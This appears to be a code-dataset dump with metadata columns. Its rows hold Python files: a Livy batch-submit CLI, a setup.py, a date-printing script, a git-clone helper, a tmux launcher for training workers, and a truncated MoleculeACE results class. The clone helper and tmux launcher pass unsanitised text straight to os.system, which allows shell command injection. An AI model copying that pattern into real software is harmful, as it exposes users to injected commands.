def now() -> datetime.datetime:
return datetime.datetime.now().astimezone(tzlocal)
args.time_prog_start = now()
# setup logger
livy.cli.logging.init(args)
console = livy.cli.logging.get("livy-read-log.main")
console.info("Submission task started")
# run pre-submit actions
args: TaskEndedArguments = run_hook(console, "PRE-SUBMIT", args, args.on_pre_submit)
# check server state
client = livy.LivyClient(url=args.api_url)
try:
client.check(False)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
# build request payload
submit_parameter = {}
for key, value in [
("file", args.script),
("class_name", args.class_name),
("args", args.args),
("jars", args.jars),
("py_files", args.py_files),
("files", args.files),
("driver_memory", args.driver_memory),
("driver_cores", args.driver_cores),
("executor_memory", args.executor_memory),
("executor_cores", args.executor_cores),
("num_executors", args.num_executors),
("archives", args.archives),
("queue", args.queue_name),
("name", args.session_name),
("conf", {k: v for k, v in args.spark_conf}),
]:
if value:
submit_parameter[key] = value
console.info(
"Creating batch with parameters: %s",
json.dumps(submit_parameter, indent=2),
)
# timing
args.time_task_submit = now()
console.debug("Batch submission time= %s", args.time_task_submit)
# submit
try:
submit_resp = client.create_batch(**submit_parameter)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
console.info("Server response: %s", json.dumps(submit_resp, indent=2))
args.batch_id = submit_resp.get("id", None)
if not isinstance(args.batch_id, int) or args.batch_id < 0:
console.error("Failed to get batch id. Something goes wrong.")
return 1
# watch log
if not args.watch_log:
console.info("Batch %d created.", args.batch_id)
return 0
console.info("Start reading logs of batch %d", args.batch_id)
reader = livy.LivyBatchLogReader(client, args.batch_id)
try:
reader.read_until_finish()
except livy.RequestError as e:
console.error(
"Error occurs during read log. HTTP code=%d, Reason=%s", e.code, e.reason
)
return 1
except KeyboardInterrupt:
msg_args = args.batch_id, args.api_url # just for shorten
console.warning("Keyboard interrupt. Local livy-submit process terminating.")
console.warning("Your task might be still running on the server.")
console.warning("For reading the logs, call:")
console.warning(" livy read-log %d --api-url %s", *msg_args)
console.warning("For stopping the task, call:")
console.warning(" livy kill %d --api-url %s", *msg_args)
return 1
# timing
args.time_task_ended = now()
console.debug("Batch finishing time= %s", args.time_task_ended)
# get ending state
try:
args.state = client.get_batch_state(args.batch_id)
except livy.RequestError:
console.error("Error during query batch ending state.")
return 1
if args.state == "success":
exit_code = 0
state_level = logging.INFO
else:
exit_code = 1
state_level = logging.WARNING
console.log(state_level, "Batch#%d ended with state= %s", args.batch_id, args.state)
elapsed_time = args.time_task_ended - args.time_task_submit
console.info(
"Batch execution time: %dsec (%s)",
elapsed_time.total_seconds(),
human_readable_timeperiod(elapsed_time),
)
# run task-end actions
if args.state == "success":
args = run_hook(console, "TASK-SUCCESS", args, args.on_task_success)
else:
args = run_hook(console, "TASK-FAILED", args, args.on_task_failed)
args = run_hook(console, "TASK", args, args.on_task_ended)
return exit_code
def argmem(s: str):
"""Validate input for memory size"""
if not re.fullmatch(r"\d+[gm]b?", s, re.RegexFlag.IGNORECASE):
raise argparse.ArgumentTypeError(
"please specific memory size in format '1234mb'"
)
return s
def argkvpair(val):
"""Splitting key value pair"""
k, v = val.split("=", 1)
return k, v
def run_hook(
logger: logging.Logger,
identifier: str,
args: argparse.Namespace,
actions: typing.List[str],
) -> argparse.Namespace:
"""Run hook actions"""
for action_name in actions:
logger.info("Run %s action %s", identifier.lower(), action_name)
func = get_function(action_name)
if not func:
logger.warning("Failed to get action function instance. Stop process.")
exit(1)
try:
args = func(identifier, args)
except:
logger.exception(
"Error occurs during %s action. Stop process.", identifier.lower()
)
exit(1)
if not isinstance(args, argparse.Namespace):
logger.error(
"Expect namespace object from %s's return value. Got %s",
action_name,
type(args).__name__,
)
exit(1)
return args
def get_function(name: str) -> typing.Callable:
"""Get function by module name"""
m = re.fullmatch(r"([\w.]+):(\w+)", name, re.RegexFlag.I)
if not m:
logger.error("Failed to resolve function name: %s", name)
logger.error("Please specific it in module:func format")
return
module_name, func_name = m.groups()
try:
module = importlib.import_module(module_name)
except ImportError:
logger.error("Failed to find module: %s", module_name)
return
try:
func = getattr(module, func_name)
except AttributeError:
logger.error("Failed to find function %s in %s", func_name, module_name)
return
return func
def human_readable_timeperiod(period: datetime.timedelta):
"""Convert time period to human readable format"""
total_seconds = int(period.total_seconds())
terms = []
days = total_seconds // 86400
if days:
terms.append(f"{days}d")
hours = total_seconds // 3600 % 24
if hours:
terms.append(f"{hours}h")
minutes = total_seconds // 60 % 60
if minutes:
terms.append(f"{minutes}m")
seconds = total_seconds % 60
if seconds:
terms.append(f"{seconds}s")
return " ".join(terms)
if __name__ == "__main__":
exit(main())
| """Submit a batch task to livy server."""
import argparse
import datetime
import importlib
import json
import logging
import re
import typing
import livy
import livy.cli.config
import livy.cli.logging
logger = logging.getLogger(__name__)
class PreSubmitArguments(argparse.Namespace):
"""Typed :py:class:`~argparse.Namespace` for arguments before task submission."""
# task
script: str
args: typing.List[str]
class_name: str
jars: typing.List[str]
py_files: typing.List[str]
files: typing.List[str]
archives: typing.List[str]
queue_name: str
session_name: str
api_url: str
driver_memory: str
driver_cores: int
executor_memory: str
executor_cores: int
num_executors: int
spark_conf: typing.List[typing.Tuple[str, str]]
# log
watch_log: bool
# time
time_prog_start: datetime.datetime
"Local time this script is called"
class TaskEndedArguments(PreSubmitArguments):
"""Typed :py:class:`~argparse.Namespace` for arguments when task is ended.
It contains all attributes from :py:class:`~livy.cli.submit.PreSubmitArguments`.
"""
# task
batch_id: int
"Batch ID response by livy server"
state: str
"Task ended state"
# time
time_task_submit: datetime.datetime
"Local time before task is submitted"
time_task_ended: datetime.datetime
"Local time that detected task is ended"
def main(argv=None):
"""CLI entrypoint"""
# parse argument
cfg = livy.cli.config.load()
parser = argparse.ArgumentParser(
prog="livy submit",
description=__doc__,
)
parser.add_argument(
"script",
help="Path to the script that contains the application to be executed",
)
parser.add_argument(
"args",
nargs="*",
help="Arguments for the task script",
)
parser.add_argument(
"--class-name",
metavar="COM.EXAMPLE.FOO",
help="Application Java/Spark main class (for Java/Scala task)",
)
parser.add_argument(
"--jars",
nargs="+",
metavar="FOO.JAR",
help="Java dependencies to be used in this batch",
)
parser.add_argument(
"--py-files",
nargs="+",
metavar="FOO.ZIP",
help="Python dependencies to be used in this batch",
)
parser.add_argument(
"--files",
nargs="+",
metavar="FOO.TXT",
help="Files to be used in this batch",
)
parser.add_argument(
"--archives",
nargs="+",
metavar="FOO.TAR",
help="Archives to be used in this batch",
)
parser.add_argument(
"--queue-name",
metavar="DEFAULT",
help="The name of the YARN queue to which submitted",
)
parser.add_argument(
"--session-name",
metavar="HELLO",
help="The session name to execute this batch",
)
group = parser.add_argument_group("pre-submit actions")
group.add_argument(
"--on-pre-submit",
metavar="PLUG",
nargs="+",
default=cfg.submit.pre_submit,
help="Run plugin(s) before submit",
)
group = parser.add_argument_group("livy server configuration")
group.add_argument(
"--api-url",
required=cfg.root.api_url is None,
default=cfg.root.api_url,
help="Base-URL for Livy API server",
)
group.add_argument(
"--driver-memory",
metavar="10G",
default=cfg.submit.driver_memory,
type=argmem,
help="Amount of memory to use for the driver process.",
)
group.add_argument(
"--driver-cores",
metavar="N",
default=cfg.submit.driver_cores,
type=int,
help="Number of cores to use for the driver process.",
)
group.add_argument(
"--executor-memory",
metavar="10G",
default=cfg.submit.executor_memory,
type=argmem,
help="Amount of memory to use for the executor process.",
)
group.add_argument(
"--executor-cores",
metavar="N",
default=cfg.submit.executor_cores,
type=int,
help="Number of cores to use for each executor.",
)
group.add_argument(
"--num-executors",
metavar="N",
default=cfg.submit.num_executors,
type=int,
help="Number of executors to launch for this batch.",
)
group.add_argument(
"--spark-conf",
metavar="CONF_NAME=VALUE",
nargs="+",
default=cfg.submit.spark_conf,
type=argkvpair,
help="Spark configuration properties.",
)
group = parser.add_argument_group("post-submit actions")
g = group.add_mutually_exclusive_group()
g.set_defaults(watch_log=cfg.submit.watch_log)
g.add_argument(
"--watch-log",
dest="watch_log",
action="store_true",
help="Watching for logs until it is finished",
)
g.add_argument(
"--no-watch-log",
dest="watch_log",
action="store_false",
help="Not to watch for logs. Only submit the task and quit.",
)
group = parser.add_argument_group("after-task-finish actions")
group.add_argument(
"--on-task-success",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_success,
help="Run plugin(s) on task is finished and success",
)
group.add_argument(
"--on-task-failed",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and failed",
)
group.add_argument(
"--on-task-ended",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and ended and regardless to its state",
)
livy.cli.logging.setup_argparse(parser)
args: PreSubmitArguments = parser.parse_args(argv)
# time stamping
tzlocal = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
def now() -> datetime.datetime:
return datetime.datetime.now().astimezone(tzlocal)
args.time_prog_start = now()
# setup logger
livy.cli.logging.init(args)
console = livy.cli.logging.get("livy-read-log.main")
console.info("Submission task started")
# run pre-submit actions
args: TaskEndedArguments = run_hook(console, "PRE-SUBMIT", args, args.on_pre_submit)
# check server state
client = livy.LivyClient(url=args.api_url)
try:
client.check(False)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
# build request payload
submit_parameter = {}
for key, value in [
("file", args.script),
("class_name", args.class_name),
("args", args.args),
("jars", args.jars),
("py_files", args.py_files),
("files", args.files),
("driver_memory", args.driver_memory),
("driver_cores", args.driver_cores),
("executor_memory", args.executor_memory),
("executor_cores", args.executor_cores),
("num_executors", args.num_executors),
("archives", args.archives),
("queue", args.queue_name),
("name", args.session_name),
("conf", {k: v for k, v in args.spark_conf}),
]:
if value:
submit_parameter[key] = value
console.info(
"Creating batch with parameters: %s",
json.dumps(submit_parameter, indent=2),
)
# timing
args.time_task_submit = now()
console.debug("Batch submission time= %s", args.time_task_submit)
# submit
try:
submit_resp = client.create_batch(**submit_parameter)
except livy.RequestError as e:
console.error("Failed to connect to server: %s", e)
return 1
console.info("Server response: %s", json.dumps(submit_resp, indent=2))
args.batch_id = submit_resp.get("id", None)
if not isinstance(args.batch_id, int) or args.batch_id < 0:
console.error("Failed to get batch id. Something goes wrong.")
return 1
# watch log
if not args.watch_log:
console.info("Batch %d created.", args.batch_id)
return 0
console.info("Start reading logs of batch %d", args.batch_id)
reader = livy.LivyBatchLogReader(client, args.batch_id)
try:
reader.read_until_finish()
except livy.RequestError as e:
console.error(
"Error occurs during read log. HTTP code=%d, Reason=%s", e.code, e.reason
)
return 1
except KeyboardInterrupt:
msg_args = args.batch_id, args.api_url # just for shorten
console.warning("Keyboard interrupt. Local livy-submit process terminating.")
console.warning("Your task might be still running on the server.")
console.warning("For reading the logs, call:")
console.warning(" livy read-log %d --api-url %s", *msg_args)
console.warning("For stopping the task, call:")
console.warning(" livy kill %d --api-url %s", *msg_args)
return 1
# timing
args.time_task_ended = now()
console.debug("Batch finishing time= %s", args.time_task_ended)
# get ending state
try:
args.state = client.get_batch_state(args.batch_id)
except livy.RequestError:
console.error("Error during query batch ending state.")
return 1
if args.state == "success":
exit_code = 0
state_level = logging.INFO
else:
exit_code = 1
state_level = logging.WARNING
console.log(state_level, "Batch#%d ended with state= %s", args.batch_id, args.state)
elapsed_time = args.time_task_ended - args.time_task_submit
console.info(
"Batch execution time: %dsec (%s)",
elapsed_time.total_seconds(),
human_readable_timeperiod(elapsed_time),
)
# run task-end actions
if args.state == "success":
args = run_hook(console, "TASK-SUCCESS", args, args.on_task_success)
else:
args = run_hook(console, "TASK-FAILED", args, args.on_task_failed)
args = run_hook(console, "TASK", args, args.on_task_ended)
return exit_code
def argmem(s: str):
"""Validate input for memory size"""
if not re.fullmatch(r"\d+[gm]b?", s, re.RegexFlag.IGNORECASE):
raise argparse.ArgumentTypeError(
"please specific memory size in format '1234mb'"
)
return s
def argkvpair(val):
"""Splitting key value pair"""
k, v = val.split("=", 1)
return k, v
def run_hook(
logger: logging.Logger,
identifier: str,
args: argparse.Namespace,
actions: typing.List[str],
) -> argparse.Namespace:
"""Run hook actions"""
for action_name in actions:
logger.info("Run %s action %s", identifier.lower(), action_name)
func = get_function(action_name)
if not func:
logger.warning("Failed to get action function instance. Stop process.")
exit(1)
try:
args = func(identifier, args)
except:
logger.exception(
"Error occurs during %s action. Stop process.", identifier.lower()
)
exit(1)
if not isinstance(args, argparse.Namespace):
logger.error(
"Expect namespace object from %s's return value. Got %s",
action_name,
type(args).__name__,
)
exit(1)
return args
def get_function(name: str) -> typing.Callable:
"""Get function by module name"""
m = re.fullmatch(r"([\w.]+):(\w+)", name, re.RegexFlag.I)
if not m:
logger.error("Failed to resolve function name: %s", name)
logger.error("Please specific it in module:func format")
return
module_name, func_name = m.groups()
try:
module = importlib.import_module(module_name)
except ImportError:
logger.error("Failed to find module: %s", module_name)
return
try:
func = getattr(module, func_name)
except AttributeError:
logger.error("Failed to find function %s in %s", func_name, module_name)
return
return func
def human_readable_timeperiod(period: datetime.timedelta):
"""Convert time period to human readable format"""
total_seconds = int(period.total_seconds())
terms = []
days = total_seconds // 86400
if days:
terms.append(f"{days}d")
hours = total_seconds // 3600 % 24
if hours:
terms.append(f"{hours}h")
minutes = total_seconds // 60 % 60
if minutes:
terms.append(f"{minutes}m")
seconds = total_seconds % 60
if seconds:
terms.append(f"{seconds}s")
return " ".join(terms)
if __name__ == "__main__":
exit(main())
| pt | 0.112358 | 2.60752 | 3 |
setup.py | nickyfoto/premoji | 0 | 13517 | """Minimal setup file for learn project."""
import pathlib
from setuptools import setup, find_packages
# The directory containing this file
HERE = pathlib.Path(__file__).parent
# The text of the README file
README = (HERE / "README.md").read_text()
setup(
name = 'premoji',
version = '0.1.4',
description = 'predict emoji on given text',
long_description = README,
long_description_content_type = "text/markdown",
license = "MIT",
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://macworks.io',
download_url = 'https://github.com/nickyfoto/premoji/archive/v0.1.3-alpha.tar.gz',
packages = find_packages(where='src'),
package_dir = {'': 'src'},
include_package_data=True,
install_requires = [
'numpy',
'scikit-learn',
],
classifiers = [
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3.7',
]
)
| """Minimal setup file for learn project."""
import pathlib
from setuptools import setup, find_packages
# The directory containing this file
HERE = pathlib.Path(__file__).parent
# The text of the README file
README = (HERE / "README.md").read_text()
setup(
name = 'premoji',
version = '0.1.4',
description = 'predict emoji on given text',
long_description = README,
long_description_content_type = "text/markdown",
license = "MIT",
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://macworks.io',
download_url = 'https://github.com/nickyfoto/premoji/archive/v0.1.3-alpha.tar.gz',
packages = find_packages(where='src'),
package_dir = {'': 'src'},
include_package_data=True,
install_requires = [
'numpy',
'scikit-learn',
],
classifiers = [
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3.7',
]
)
| pt | 0.250915 | 1.776083 | 2 |
02-current-time.py | KeithWilliamsGMIT/Emerging-Technologies-Python-Fundamentals | 0 | 13518 | <reponame>KeithWilliamsGMIT/Emerging-Technologies-Python-Fundamentals<filename>02-current-time.py
# Author: <NAME>
# Date: 21/09/2017
from time import strftime
# This line prints the current date and time to the console in the format 01-10-2017 13:15:30.
# strftime must be imported from the time package before being used.
print(strftime("%d-%m-%Y %H:%M:%S")) | # Author: <NAME>
# Date: 21/09/2017
from time import strftime
# This line prints the current date and time to the console in the format 01-10-2017 13:15:30.
# strftime must be imported from the time package before being used.
print(strftime("%d-%m-%Y %H:%M:%S")) | pt | 0.136429 | 3.701859 | 4 |
git_management/clone.py | afsantaliestra/scripts | 0 | 13519 | <reponame>afsantaliestra/scripts<gh_stars>0
import os
filepath = 'list.txt'
with open(filepath) as fp:
while line := fp.readline():
line = line.strip()
os.system(f'git clone {line}')
| import os
filepath = 'list.txt'
with open(filepath) as fp:
while line := fp.readline():
line = line.strip()
os.system(f'git clone {line}') | none | 1 | 2.515881 | 3 |
train.py | amansoni/sequential-decision-problem-algorithms | 0 | 13520 | <reponame>amansoni/sequential-decision-problem-algorithms
import argparse
import os
import sys
parser = argparse.ArgumentParser(description="Run commands")
parser.add_argument('-w', '--num-workers', default=1, type=int,
help="Number of workers")
parser.add_argument('-r', '--remotes', default=None,
help='The address of pre-existing VNC servers and '
'rewarders to use (e.g. -r vnc://localhost:5900+15900,vnc://localhost:5901+15901).')
parser.add_argument('-e', '--env-id', type=str, default="PongDeterministic-v3",
help="Environment id")
parser.add_argument('-l', '--log-dir', type=str, default="/tmp/pong",
help="Log directory path")
def new_tmux_cmd(session, name, cmd):
if isinstance(cmd, (list, tuple)):
cmd = " ".join(str(v) for v in cmd)
return name, "tmux send-keys -t {}:{} '{}' Enter".format(session, name, cmd)
def create_tmux_commands(session, num_workers, remotes, env_id, logdir, shell='sh'):
# for launching the TF workers and for launching tensorboard
base_cmd = [
'CUDA_VISIBLE_DEVICES=', sys.executable, 'worker.py',
'--log-dir', logdir, '--env-id', env_id,
'--num-workers', str(num_workers)]
if remotes is None:
remotes = ["1"] * num_workers
else:
remotes = remotes.split(',')
assert len(remotes) == num_workers
cmds_map = [new_tmux_cmd(session, "ps", base_cmd + ["--job-name", "ps"])]
for i in range(num_workers):
cmds_map += [new_tmux_cmd(session,
"w-%d" % i, base_cmd + ["--job-name", "worker", "--task", str(i), "--remotes", remotes[i]])]
cmds_map += [new_tmux_cmd(session, "tb", ["tensorboard --logdir {} --port 12345".format(logdir)])]
cmds_map += [new_tmux_cmd(session, "htop", ["htop"])]
windows = [v[0] for v in cmds_map]
cmds = [
"mkdir -p {}".format(logdir),
"tmux kill-session -t {}".format(session),
"tmux new-session -s {} -n {} -d {}".format(session, windows[0], shell)
]
for w in windows[1:]:
cmds += ["tmux new-window -t {} -n {} {}".format(session, w, shell)]
cmds += ["sleep 1"]
for window, cmd in cmds_map:
cmds += [cmd]
return cmds
def run():
args = parser.parse_args()
cmds = create_tmux_commands("a3c", args.num_workers, args.remotes, args.env_id, args.log_dir)
print("\n".join(cmds))
os.system("\n".join(cmds))
if __name__ == "__main__":
run()
| import argparse
import os
import sys
parser = argparse.ArgumentParser(description="Run commands")
parser.add_argument('-w', '--num-workers', default=1, type=int,
help="Number of workers")
parser.add_argument('-r', '--remotes', default=None,
help='The address of pre-existing VNC servers and '
'rewarders to use (e.g. -r vnc://localhost:5900+15900,vnc://localhost:5901+15901).')
parser.add_argument('-e', '--env-id', type=str, default="PongDeterministic-v3",
help="Environment id")
parser.add_argument('-l', '--log-dir', type=str, default="/tmp/pong",
help="Log directory path")
def new_tmux_cmd(session, name, cmd):
if isinstance(cmd, (list, tuple)):
cmd = " ".join(str(v) for v in cmd)
return name, "tmux send-keys -t {}:{} '{}' Enter".format(session, name, cmd)
def create_tmux_commands(session, num_workers, remotes, env_id, logdir, shell='sh'):
# for launching the TF workers and for launching tensorboard
base_cmd = [
'CUDA_VISIBLE_DEVICES=', sys.executable, 'worker.py',
'--log-dir', logdir, '--env-id', env_id,
'--num-workers', str(num_workers)]
if remotes is None:
remotes = ["1"] * num_workers
else:
remotes = remotes.split(',')
assert len(remotes) == num_workers
cmds_map = [new_tmux_cmd(session, "ps", base_cmd + ["--job-name", "ps"])]
for i in range(num_workers):
cmds_map += [new_tmux_cmd(session,
"w-%d" % i, base_cmd + ["--job-name", "worker", "--task", str(i), "--remotes", remotes[i]])]
cmds_map += [new_tmux_cmd(session, "tb", ["tensorboard --logdir {} --port 12345".format(logdir)])]
cmds_map += [new_tmux_cmd(session, "htop", ["htop"])]
windows = [v[0] for v in cmds_map]
cmds = [
"mkdir -p {}".format(logdir),
"tmux kill-session -t {}".format(session),
"tmux new-session -s {} -n {} -d {}".format(session, windows[0], shell)
]
for w in windows[1:]:
cmds += ["tmux new-window -t {} -n {} {}".format(session, w, shell)]
cmds += ["sleep 1"]
for window, cmd in cmds_map:
cmds += [cmd]
return cmds
def run():
args = parser.parse_args()
cmds = create_tmux_commands("a3c", args.num_workers, args.remotes, args.env_id, args.log_dir)
print("\n".join(cmds))
os.system("\n".join(cmds))
if __name__ == "__main__":
run() | pt | 0.14048 | 2.441517 | 2 |
MoleculeACE/benchmark/evaluation/results.py | molML/MoleculeACE | 9 | 13521 | """
Class that holds the results: used for evaluating model performance on activity cliff compounds
<NAME>, Eindhoven University of Technology, March 2022
"""
import os
import numpy as np
from MoleculeACE.benchmark.utils.const import Algorithms
from .metrics import calc_rmse, calc_q2f3
class Results:
def __init__(self, predictions=None, reference=None, y_train=None, data=None,
tanimoto_cliff_compounds=None, scaffold_cliff_compounds=None, levenshtein_cliff_compounds=None,
soft_consensus_cliff_compounds=None):
self.predictions = predictions
self.reference = reference
self.y_train = y_train
self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
self.scaffold_cliff_compounds = scaffold_cliff_compounds
self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds
self.data = data
self.rmse = np.inf
self.q2f3 = 0
self.tanimoto_cliff_rmse = np.inf
self.scaffold_cliff_rmse = np.inf
self.levenshtein_cliff_rmse = np.inf
self.soft_consensus_cliff_rmse = np.inf
def calc_rmse(self, reference=None, predictions=None):
""" Calculate the rmse from two lists of reference and predicted bioactivity"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
# calculate the rmsd
self.rmse = calc_rmse(self.reference, self.predictions)
return self.rmse
def calc_q2f3(self, reference=None, predictions=None, y_train=None):
""" Calculates the Q2 F3 score (best according to Todeschini et al. 2016)
Args:
reference: (1d array-like shape) true test values (float)
predictions: (1d array-like shape) predicted test values (float)
y_train: (1d array-like shape) true train values (float)
Returns: Q2F3 score
"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
if y_train is not None:
self.y_train = y_train
# calculate the q2f3
self.q2f3 = calc_q2f3(self.reference, self.predictions, self.y_train)
return self.q2f3
def calc_cliff_rmse(self, reference=None, predictions=None, tanimoto_cliff_compounds=None,
scaffold_cliff_compounds=None, levenshtein_cliff_compounds=None,
soft_consensus_cliff_compounds=None):
""" Calculate the rmse of only cliff compounds
Args:
levenshtein_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
tanimoto_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
scaffold_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
consensus_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
soft_consensus_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
reference: (lst) true bioactivity values
predictions: (lst) predicted bioactivity values
cliff_compounds: (lst) binary list describing if a compound is a cliff compound (1 == cliff, 0 == no cliff)
Returns: (float) rmse
"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
if tanimoto_cliff_compounds is not None:
self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
if scaffold_cliff_compounds is not None:
self.scaffold_cliff_compounds = scaffold_cliff_compounds
if levenshtein_cliff_compounds is not None:
self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
if soft_consensus_cliff_compounds is not None:
self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds
if self.tanimoto_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.tanimoto_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.tanimoto_cliff_compounds) if clf == 1]
self.tanimoto_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.scaffold_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.scaffold_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.scaffold_cliff_compounds) if clf == 1]
self.scaffold_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.levenshtein_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.levenshtein_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.levenshtein_cliff_compounds) if clf == 1]
self.levenshtein_cliff_rmse = calc_rmse(clf_ref, clf_prd)
if self.soft_consensus_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.soft_consensus_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.soft_consensus_cliff_compounds) if clf == 1]
self.soft_consensus_cliff_rmse = calc_rmse(clf_ref, clf_prd)
return {'tanimoto_cliff_rmse': self.tanimoto_cliff_rmse, 'scaffold_cliff_rmse': self.scaffold_cliff_rmse,
'levenshtein_cliff_rmse': self.levenshtein_cliff_rmse,
'soft_consensus_cliff_rmse': self.soft_consensus_cliff_rmse}
def to_csv(self, filename, algorithm: Algorithms = None):
# Create output file if it doesnt exist
if self.data is not None:
if not os.path.isfile(filename):
with open(filename, 'w') as f:
f.write('dataset,'
'algorithm,'
'descriptor,'
'augmentation,'
'rmse,'
'cliff_rmse,'
'n_compounds,'
'n_cliff_compounds,'
'n_compounds_train,'
'n_cliff_compounds_train,'
'n_compounds_test,'
'n_cliff_compounds_test\n')
with open(filename, 'a') as f:
f.write(f'{self.data.name},'
f'{algorithm.value},'
f'{self.data.descriptor.value},'
f'{self.data.augmentation},'
f'{self.rmse},'
f'{self.soft_consensus_cliff_rmse},'
f'{self.data.cliffs.stats["n_compounds"]},'
f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds"]},'
f'{self.data.cliffs.stats["n_compounds_train"]},'
f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_train"]},'
f'{self.data.cliffs.stats["n_compounds_test"]},'
f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_test"]}\n')
def __repr__(self):
return f"RMSE: {self.rmse:.4f}\n" \
f"Q2F3: {self.q2f3:.4f}\n" \
f"AC-RMSE: {self.soft_consensus_cliff_rmse:.4f}\n"
| """
Class that holds the results: used for evaluating model performance on activity cliff compounds
<NAME>, Eindhoven University of Technology, March 2022
"""
import os
import numpy as np
from MoleculeACE.benchmark.utils.const import Algorithms
from .metrics import calc_rmse, calc_q2f3
class Results:
def __init__(self, predictions=None, reference=None, y_train=None, data=None,
tanimoto_cliff_compounds=None, scaffold_cliff_compounds=None, levenshtein_cliff_compounds=None,
soft_consensus_cliff_compounds=None):
self.predictions = predictions
self.reference = reference
self.y_train = y_train
self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
self.scaffold_cliff_compounds = scaffold_cliff_compounds
self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds
self.data = data
self.rmse = np.inf
self.q2f3 = 0
self.tanimoto_cliff_rmse = np.inf
self.scaffold_cliff_rmse = np.inf
self.levenshtein_cliff_rmse = np.inf
self.soft_consensus_cliff_rmse = np.inf
def calc_rmse(self, reference=None, predictions=None):
""" Calculate the rmse from two lists of reference and predicted bioactivity"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
# calculate the rmsd
self.rmse = calc_rmse(self.reference, self.predictions)
return self.rmse
def calc_q2f3(self, reference=None, predictions=None, y_train=None):
""" Calculates the Q2 F3 score (best according to Todeschini et al. 2016)
Args:
reference: (1d array-like shape) true test values (float)
predictions: (1d array-like shape) predicted test values (float)
y_train: (1d array-like shape) true train values (float)
Returns: Q2F3 score
"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
if y_train is not None:
self.y_train = y_train
# calculate the q2f3
self.q2f3 = calc_q2f3(self.reference, self.predictions, self.y_train)
return self.q2f3
def calc_cliff_rmse(self, reference=None, predictions=None, tanimoto_cliff_compounds=None,
scaffold_cliff_compounds=None, levenshtein_cliff_compounds=None,
soft_consensus_cliff_compounds=None):
""" Calculate the rmse of only cliff compounds
Args:
levenshtein_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
tanimoto_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
scaffold_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
consensus_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
soft_consensus_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
reference: (lst) true bioactivity values
predictions: (lst) predicted bioactivity values
cliff_compounds: (lst) binary list describing if a compound is a cliff compound (1 == cliff, 0 == no cliff)
Returns: (float) rmse
"""
if reference is not None:
self.reference = reference
if predictions is not None:
self.predictions = predictions
if tanimoto_cliff_compounds is not None:
self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
if scaffold_cliff_compounds is not None:
self.scaffold_cliff_compounds = scaffold_cliff_compounds
if levenshtein_cliff_compounds is not None:
self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
if soft_consensus_cliff_compounds is not None:
self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds
if self.tanimoto_cliff_compounds is not None:
# Subset only reference and predicted values of the cliff compounds, then calculate cliff rmse
clf_ref = [self.reference[idx] for idx, clf in enumerate(self.tanimoto_cliff_compounds) if clf == 1]
clf_prd = [self.predictions[idx] for idx, clf in enumerate(self.tanimoto_cliff_compounds) if clf == 1]
